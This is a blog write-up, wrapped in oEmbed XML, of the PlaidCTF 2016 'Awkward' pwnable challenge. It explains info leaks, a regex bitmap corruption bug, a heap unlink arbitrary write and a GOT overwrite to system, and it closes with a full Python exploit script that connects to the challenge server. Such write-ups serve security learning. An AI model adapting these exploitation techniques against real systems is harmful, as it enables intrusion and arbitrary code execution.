<?xml version="1.0" encoding="UTF-8" standalone="yes"?><oembed><version><![CDATA[1.0]]></version><provider_name><![CDATA[dougallj]]></provider_name><provider_url><![CDATA[https://dougallj.wordpress.com]]></provider_url><author_name><![CDATA[dougallj]]></author_name><author_url><![CDATA[https://dougallj.wordpress.com/author/dougallj/]]></author_url><title><![CDATA[PlaidCTF 2016 &#8211; Awkward [Pwnable&nbsp;600]]]></title><type><![CDATA[link]]></type><html><![CDATA[<p>Awkward was an exploitation challenge, providing a pretty serious &#8220;awk&#8221; like interpreter, with a variety of different bugs.</p>
<p>I used IDA and Hex-Rays extensively to reverse it.</p>
<p>After a bit of reversing, I got it running simple programs like this:</p>
<pre class="p1"><span class="s1">START { }
</span><span class="s1">FINISH { printf "%d", 1; }
</span></pre>
<p class="p1">And, mostly by lucky guess found the information leak vulnerability, where <strong>printf</strong> failed to check types, allowing leaking heap addresses with:</p>
<pre class="p1"><span class="s1"> printf "%x", "string";</span></pre>
<p class="p1">And reading strings from arbitrary addresses with:</p>
<pre class="p1"> printf "%s", 12345678;</pre>
<p class="p1">This was all I had for probably 10 hours. I reversed most of the interpreter, the hash-map, deeply investigated some weird behaviour with regards to string splitting, field-separators and string joining. Nothing. Eventually I found another (probably unintended) information leak vulnerability, which looked like:</p>
<pre class="p1"> "string"; x = y;</pre>
<p class="p1">If <strong>y</strong> was an uninitialized variable, <strong>x</strong> would become the address of <strong>&#8220;string&#8221;</strong>.</p>
<p class="p1">Finally, and somewhat apprehensively, I embarked on reversing the last remaining component: the regex engine. Finally, I found the corruption bug &#8211; when parsing character sets (<strong>[abc]</strong> notation), the byte values were being sign-extended before writing bits into a bitmap.</p>
<p class="p1"><img loading="lazy" data-attachment-id="412" data-permalink="https://dougallj.wordpress.com/2016/04/18/plaidctf-2016-awkward-pwnable-600/screen-shot-2016-04-18-at-10-23-37-pm/" data-orig-file="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png" data-orig-size="724,208" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Screen Shot 2016-04-18 at 10.23.37 PM" data-image-description="" data-image-caption="" data-medium-file="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png?w=300" data-large-file="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png?w=724" class="alignnone size-full wp-image-412" src="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png?w=724&#038;h=208" alt="Screen Shot 2016-04-18 at 10.23.37 PM.png" width="724" height="208" srcset="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png 724w, https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png?w=150&amp;h=43 150w, https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png?w=300&amp;h=86 300w" sizes="(max-width: 724px) 100vw, 724px" /></p>
<p class="p1">(v24 is an int, from a sign-extended character)</p>
<p class="p1">This allowed setting bits before the start of the bitmap using bytes <strong>80</strong> to <strong>FF</strong>. This allows only a handful of fields to be corrupted. Long story short, there was a &#8220;next&#8221; pointer field which was initialised to <strong>NULL</strong> earlier in the structure. I could write into it bit-by-bit, and as long as it was the last thing in the regex it would keep the new value (otherwise it would be overwritten by a real next value).</p>
<p class="p1">I took some notes on which byte values mapped to which bits, just by trying it and looking at the crash address in <strong>gdb</strong>, and eventually figured out the rules. I probably should have used a mathematical approach to calculate it, but sometimes it&#8217;s safer to just trust what you can see:</p>
<pre class="p1"> # NOTE: 0xC0 -&gt; 1
 # NOTE: 0xB9 -&gt; 2
 # NOTE: 0xBA -&gt; 4
 # NOTE: 0xBB -&gt; 8
 # NOTE: 0xBC -&gt; 10
 # NOTE: 0xBF -&gt; 80
 # NOTE: 0xC8 -&gt; 100
 # NOTE: 0xC1 -&gt; 200
 # NOTE: 0xC2 -&gt; 400
 # NOTE: 0xC7 -&gt; 8000</pre>
<p class="p1">I combined it into the following python for setting an arbitrary address:</p>
<pre class="p1"> target = 0x12345678
 lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
           [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
 chrs = ''
 for i in range(0, 32):
     if target &amp; (1 &lt;&lt; i):
         chrs += chr(lookup[i])
 print 'print ' + str(i) + ', "hello" ~ /[' + chrs + ']/;'</pre>
<p class="p1">I spent a few hours poking around different options for what to confuse with a &#8220;next&#8221; node before realising that if the first byte is a safe value it doesn&#8217;t crash and just frees the provided address.</p>
<p class="p1">I spent longer pondering what I should free before deciding on the &#8220;fields&#8221; array (pretty much the only array the code can access). This is an array of <strong>char*</strong> that is initialised by splitting the input line, but you can reallocate it to be a pretty arbitrary size by assigning to it. You can then write pointers to arbitrary strings into it. Pretty convenient, right?</p>
<p class="p1"><img loading="lazy" data-attachment-id="370" data-permalink="https://dougallj.wordpress.com/2016/04/18/plaidctf-2016-awkward-pwnable-600/fields-array/" data-orig-file="https://dougallj.files.wordpress.com/2016/04/fields-array.png" data-orig-size="1164,1514" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="fields-array" data-image-description="" data-image-caption="" data-medium-file="https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=231" data-large-file="https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=787" class="alignnone size-full wp-image-370" src="https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=1164&#038;h=1514" alt="fields-array.png" width="1164" height="1514" srcset="https://dougallj.files.wordpress.com/2016/04/fields-array.png 1164w, https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=115&amp;h=150 115w, https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=231&amp;h=300 231w, https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=768&amp;h=999 768w, https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=787&amp;h=1024 787w" sizes="(max-width: 1164px) 100vw, 1164px" /></p>
<p class="p1">I found the address of the fields array by leaking some strings on either side of it in the heap and adding a constant offset:</p>
<pre class="p1"> str = "aaaabbbbccccddddeeeeffffgggghhhh";
 # duplicate the string and get its address a few times
 str; q = z;
 str; r = z;
 str; s = z;
 str; t = z;
 # reallocate fields array
 $128 = "1";
 # get one after it for reference
 str; u = z;
 # dump the addresses
 printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
 printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;
 x = t + 112;
 printf "fields array: %x\n", x;</pre>
<p class="p1">I then rewrote my arbitrary-free to use awk to construct the regex:</p>
<pre class="p1"> code = 's = "he[";\n'
 lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
           [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
 for i in range(31, -1, -1):
     code += 'if (x &gt;= ' + str(1&lt;&lt;i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1&lt;&lt;i) + '; }\n'
 code += 's = s "]";\n'
 code += 'print "hello" ~ s;\n'</pre>
<p class="p1">So, this is enough to free the fields array, but I needed to turn it into an arbitrary write. I chose to use the linked list removal operation of the variable hashmap for this (a super awkward technique, as you&#8217;ll see).</p>
<p class="p1"><img loading="lazy" data-attachment-id="373" data-permalink="https://dougallj.wordpress.com/2016/04/18/plaidctf-2016-awkward-pwnable-600/screen-shot-2016-04-18-at-9-56-48-pm/" data-orig-file="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png" data-orig-size="1092,1528" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Screen Shot 2016-04-18 at 9.56.48 PM" data-image-description="" data-image-caption="" data-medium-file="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=214" data-large-file="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=732" class="alignnone size-full wp-image-373" src="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=1092&#038;h=1528" alt="Screen Shot 2016-04-18 at 9.56.48 PM.png" width="1092" height="1528" srcset="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png 1092w, https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=107&amp;h=150 107w, https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=214&amp;h=300 214w, https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=768&amp;h=1075 768w, https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=732&amp;h=1024 732w" sizes="(max-width: 1092px) 100vw, 1092px" /></p>
<p class="p1">Once the fields-array was freed, I declared a new variable to reallocate the variables hashmap into the freed memory (and I declared enough variables earlier to make sure that this would cross the 70% threshold on line 61).</p>
<p class="p1">Because I could leak the address of arbitrary string data I could construct some very complex structures in memory. I used this to create a fake <strong>hashmap_entry</strong> structure, with the name pointing to a real name string. I inserted this structure in the correct slot in the hashmap by writing into the fields array, then declared a real variable with the same name, running the unlinking code in the listing above.</p>
<p class="p1">I wanted to use the code on line 38 write to an arbitrary address, but unfortunately the &#8220;next&#8221; address had to be a valid address as well. To solve this I leaked the address of a large string in memory, and chose offsets into the string to control the low byte of the address. This allowed an arbitrary pointer to be written by repeating the &#8220;unlinking&#8221; primitive four times (increasing the write address each time).</p>
<p class="p1">I used the printf leak to leak the address of <strong>strlen</strong> from the <strong>GOT</strong> then added an offset to find the address of <strong>system</strong> (since my local libc was the same), and used the unlinking technique to replace the value. <strong>strlen</strong> was used by <strong>printf</strong> when printing strings, so after corruption I could get the flag by writing:</p>
<pre class="p1"><span class="s1"> printf "%s\n", "cat flag\n"; </span></pre>
<h2>Full Code</h2>
<p>The full code for my exploit (in all of its hasty awkward messiness) is listed below. It has a few more tricks that hopefully don&#8217;t need too much explanation. I&#8217;m afraid I used a rather inappropriate variable name (after 20 hours of hitting my head against this problem I was a bit frustrated), and then hardcoded the hash value making it too error-prone to change after the fact. Sorry.</p>
<pre>import socket
import struct
import random
import string
import time
import sys

ADDRESS = ('192.168.46.138', 10241)
ADDRESS = ('awkward.pwning.xxx', 2323)
VERBOSE = True
VERBOSE = False

sock = socket.create_connection(ADDRESS)
def read_byte():
    buf = sock.recv(1)
    if not buf:
        raise EOFError
    return buf

def read_n(n):
    s = ''.join(read_byte() for i in range(n))
    if VERBOSE:
        print '&lt;', `s`
    return s

def read_until(sentinel='\n'):
    s = ''
    while not s.endswith(sentinel):
        b = read_byte()
        if VERBOSE:
            sys.stdout.write(repr(b)[1:-1])
            if b == '\n':
                sys.stdout.write('\n')
            sys.stdout.flush()
        s += b
    return s

def send(s):
    if VERBOSE:
        print '&gt;', `s`
    sock.sendall(s)

program = '''
BEGIN { }
{
    FS = "xyz";
    if ( $1 == "r" ) { printf "&gt;&gt;&gt;%s&lt;&lt;&lt;\n", 0 + $2; }
    if ( $1 == "a" ) { printf "&gt;&gt;&gt;%d&lt;&lt;&lt;\n", $2; }
    if ( $1 == "s" ) { saved0 = $2; saved1 = $3; saved2 = $4; saved3 = $5; }
    if ( $1 == "l" )
    {'''
for i in range(5):
    program += "padding%d = \"0\";" % i;
program += '''
        str = "aaaabbbbccccddddeeeeffffgggghhhh";
        str; q = z;
        str; r = z;
        str; s = z;
        str; t = z;
        $128 = "1";
        str; u = z;

        print q;
        printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
        printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;

        x = t + 112;
        #x = 305419896;
        printf "freeing %x\n", x;

        s = "he[";
'''
lookup = [0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) + [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8)
for i in range(31, -1, -1):
    program += 'if (x &gt;= ' + str(1 &lt;&lt; i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1 &lt;&lt; i) + '; }\n'
program += '''
        s = s "]";
        print x;
        print s;
        print "hello" ~ s;
        realloc = 1;
        $50 = saved0;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved1;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved2;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved3;
        print "alive";
        fuck = 1;
        print "alive?";

        printf "%s\n", "cat flag\n"; 
        print "alive??";
    }
}
FINISH { }
'''

#0xf75cb180 &lt;system
#0xf7607690 &lt;strlen

read_until('Program?')
send(program)
read_until('Ready.')


def read_address_string(a):
    send("rxyz%d\n" % (a,))
    read_until('&gt;&gt;&gt;')
    return read_until('&lt;&lt;&lt;')[:-3]

def get_address_of_string(a):
    assert ' ' not in a and '\n' not in a
    send("axyz%s\n" % (a,))
    read_until('&gt;&gt;&gt;')
    return int(read_until('&lt;&lt;&lt;')[:-3])

def read_at_least(a, n):
    r = ''
    while len(r) &lt; n:
        r += read_address_string(a + len(r)) + '\0'
    return r

def read_dword(a):
    return struct.unpack_from('I', read_at_least(a, 4))[0]

strlen_got = 0x8052040
strlen = read_dword(strlen_got)

system = strlen + (0xf759b180-0xf75e13c0)
print hex(strlen)

junk_string = 'a' * 1024

scratch_start = get_address_of_string(junk_string)

name = get_address_of_string('fuck')
def generate_block(write_to, byte):
    target = (scratch_start + 256) &amp; ~0xFF
    next_in_chain = prev_in_chain = next_ = prev = cache = target + byte
    type_ = 0x41414141
    value = 0x41414141

    next_offset = 0x8
    prev = write_to - next_offset


    print map(hex, (next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache))
    return struct.pack('IIIIIIII', next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache);

def do_hash(name):
    h = 0
    for i in name:
        h = ord(i) + 1337 * h
    return h

def save(a,b,c,d):
    for s in (a,b,c,d):
        assert '\n' not in s, `s`
        assert 'xyz' not in s, `s`
        assert '\0' not in s, `s`
    send("sxyz%sxyz%sxyz%sxyz%s\n" % (a,b,c,d))

print do_hash('fuck') % 64

save(
    generate_block(strlen_got, (system &amp; 0xFF)),
    generate_block(strlen_got+1, ((system &gt;&gt; 8) &amp; 0xFF)),
    generate_block(strlen_got+2, ((system &gt;&gt; 16) &amp; 0xFF)),
    generate_block(strlen_got+3, ((system &gt;&gt; 24) &amp; 0xFF)),
    )
raw_input('attach?') # ps aux | grep ' ./awkw' | grep -v grep | cut -c10-15
send('lxyzaxyzb\n')
VERBOSE = True
read_until('xxxxx')
</pre>
<p>&nbsp;</p>
]]></html><thumbnail_url><![CDATA[https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png?fit=440%2C330]]></thumbnail_url><thumbnail_width><![CDATA[439]]></thumbnail_width><thumbnail_height><![CDATA[126]]></thumbnail_height></oembed>